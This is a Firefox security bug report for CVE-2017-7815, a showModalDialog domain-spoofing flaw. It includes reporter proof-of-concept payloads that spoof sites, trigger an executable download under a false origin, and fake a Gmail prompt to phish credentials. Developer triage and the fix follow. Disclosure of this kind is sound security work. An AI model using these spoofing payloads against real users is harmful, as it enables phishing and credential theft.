Bug 1368981 (CVE-2017-7815)

Firefox allows you to insert modal dialog in any domain

RESOLVED FIXED

Status

()

defect
P2
normal
RESOLVED FIXED
2 years ago
3 months ago

People

(Reporter: jm.acuna73, Assigned: mrbkap)

Tracking

({sec-moderate})

unspecified
Points:
---
Bug Flags:
sec-bounty +
qe-verify -

Firefox Tracking Flags

(firefox-esr52 wontfix, firefox55 wontfix, firefox56 fixed, firefox57 fixed)

Details

(Whiteboard: [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796)

Attachments

(1 attachment)

Reporter

Description

2 years ago
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Steps to reproduce:

1- Go to:

data:text/html,<script>function loadIframe() {win = open('','_top');win.document.open();win.document.write('data:text/html,<s'+'cript>location="https://www.google.com";</s'+'cript>');win.document.close();}function go() {var iframe = '<iframe onload="loadIframe();"></iframe>';document.body.innerHTML = iframe; showModalDialog('https://www.firefox.com','','dialogWidth=600;dialogHeight=600');}</script><input type="button" onclick="go()" value="test"/>

2- Click button

Bug detected in Firefox browsers that do not use multi-process architecture or e10s

Tested in:

Firefox Nightly 55.0a1 (2017-05-17) (64-bit)
Firefox Developer Edition 54.0a2 (2017-04-18) (32-bits)
Firefox 53.0.2 (32-bit)

Note:

I consider that it is not a variant of the bug with id 1365875 because the showModalDialog method is not part of the three types of native popup boxes in javascript
Reporter

Updated

2 years ago
Group: firefox-core-security
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM
Product: Firefox → Core
Version: 55 Branch → unspecified
Reporter

Comment 1

2 years ago
You could use the showModalDialog method to download a file from an unauthorized domain.

Example:

data:text/html,<input type="button" onclick="go()" value="test"/><script>
function loadIframe() {
	var win = open('','_top');
	win.document.open();
	win.document.write('data:text/html,<s'+'cript>location = \'https://www.google.com\';</s'+'cript>');
	win.document.close();
}
function go() {
	var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
	document.body.innerHTML += iframe;
	window.showModalDialog('http://d.7-zip.org/a/7z1700.exe',window,'dialogWidth=100px;dialogHeight:100px');
}
</script>
Reporter

Comment 2

2 years ago
And it could even steal the credentials of an unsuspecting user.

Go to:


data:text/html,<input type="button" onclick="go()" value="test"/>
<script>
function loadIframe() {
	var win = open('','_top');
	win.document.open();
	win.document.write('data:text/html,<s'+'cript>location = \'https://mail.google.com\';</s'+'cript>');
	win.document.close();
}
function go() {
	var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
	document.body.innerHTML = iframe;
	window.showModalDialog('data:text/html,<h3>Loadig...</h3><input type="button" value="Accept" onclick="window.close()"/>',window,'dialogWidth=100px;dialogHeight:100px');
	location = 'http://feeds.feedburner.com/GoogleInbox';
}
</script>
We're removing showModalDialog with e10s (in bug 981796), right, Blake?
Flags: needinfo?(mrbkap)
(In reply to Andrew Overholt [:overholt] from comment #3)
> We're removing showModalDialog with e10s (in bug 981796), right, Blake?

showModalDialog isn't supported with e10s, and comment 0 says this doesn't affect e10s.

We looked at this in sec triage, and it seemed like a fairly convincing spoof.
Reporter

Comment 5

2 years ago

Updated

2 years ago
See Also: → CVE-2017-7791
Let's just turn off showModalDialog for everybody. It'll be behind a pref for a bit and we'll remove the code soon after.
Flags: needinfo?(mrbkap)
I was thinking we'd eventually get e10s to 100% but comment 6 works for me. I'm assuming we'll just do that in bug 981796.
Priority: -- → P2
Flags: sec-bounty?
Reporter

Comment 9

2 years ago
Hi,

I do not know what exactly means "bug which should be worked on in the next release/iteration"
but I have checked that it is reproduced in:

- Firefox 55.0.3 (32-bit)
- Firefox ESR 52.3.0 (64-bit)

It is not reproduced in:

- Firefox Developer Edition 56.0b3 (32-bits)
- Firefox Nightly 57.0a1 (2017-08-28) (64-bit)


Tested in Firefox browsers that do not use multi-process architecture or e10s.
(I used the html code from Comment 2)
This was fixed via bug 981796, which removed showModalDialog.
Assignee: nobody → mrbkap
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Reporter

Comment 11

2 years ago
I understand now :)
Thank you!
Flags: sec-bounty? → sec-bounty+
Whiteboard: Fixed by removing ShowModalDialog in bug 981796
Group: dom-core-security → core-security-release
Alias: CVE-2017-7815
Whiteboard: Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+] Fixed by removing ShowModalDialog in bug 981796
Flags: qe-verify-
Whiteboard: [adv-main56+] Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796
Group: core-security-release
Component: DOM → DOM: Core & HTML
You need to log in before you can comment on or make changes to this bug.